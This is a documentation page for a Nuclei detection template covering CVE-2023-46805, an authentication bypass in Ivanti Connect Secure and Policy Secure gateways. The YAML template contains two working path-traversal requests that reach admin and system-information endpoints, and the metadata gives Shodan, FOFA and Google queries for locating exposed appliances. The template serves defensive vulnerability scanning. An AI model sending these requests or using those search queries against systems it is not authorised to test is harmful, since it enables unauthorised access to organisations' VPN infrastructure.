Skip to content
Nuclei Templates

Ivanti ICS - Authentication Bypass

ID: CVE-2023-46805

Severity: high

Author: DhiyaneshDK,daffainfo,geeknik

Tags: packetstorm,cve,cve2023,kev,auth-bypass,ivanti

Description

Section titled “Description”

An authentication bypass vulnerability in the web component of Ivanti ICS 9.x, 22.x and Ivanti Policy Secure allows a remote attacker to access restricted resources by bypassing control checks.

YAML Source

Section titled “YAML Source”
id: CVE-2023-46805


info:
  name: Ivanti ICS - Authentication Bypass
  author: DhiyaneshDK,daffainfo,geeknik
  severity: high
  description: An authentication bypass vulnerability in the web component of Ivanti ICS 9.x, 22.x and Ivanti Policy Secure allows a remote attacker to access restricted resources by bypassing control checks.
  reference:
    - https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US
    - https://nvd.nist.gov/vuln/detail/CVE-2023-46805
    - http://packetstormsecurity.com/files/176668/Ivanti-Connect-Secure-Unauthenticated-Remote-Code-Execution.html
    - https://github.com/H4lo/awesome-IoT-security-article
    - https://github.com/inguardians/ivanti-VPN-issues-2024-research
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
    cvss-score: 8.2
    cve-id: CVE-2023-46805
    cwe-id: CWE-287
    epss-score: 0.96558
    epss-percentile: 0.99613
    cpe: cpe:2.3:a:ivanti:connect_secure:9.0:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: ivanti
    product: connect_secure
    shodan-query: "html:\"welcome.cgi?p=logo\""
    fofa-query: body="welcome.cgi?p=logo"
    google-query: intitle:"ivanti connect secure"
  tags: packetstorm,cve,cve2023,kev,auth-bypass,ivanti


http:
  - raw:
      - |
        GET /api/v1/totp/user-backup-code/../../system/system-information HTTP/1.1
        Host: {{Hostname}}


      - |
        GET /api/v1/cav/client/status/../../admin/options HTTP/1.1
        Host: {{Hostname}}


    matchers-condition: or
    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 200'
          - 'contains_all(body_1, "build", "system-information", "software-inventory")'
          - 'contains(header_1, "application/json")'
        condition: and


      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains_all(body_2, "poll_interval\": 300", "block_message\": \"")'
          - 'contains(header_2, "application/json")'
        condition: and
# digest: 4a0a004730450221008e4af33da0c6d60542f3fa4893df59e295b0d5dc52670d2d96d694bedb82eb0502204b86fc81936f4b8b3e43990f178ddff77f7db7f664f1070b74e477ec11f4ab96:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-46805.yaml"

View on Github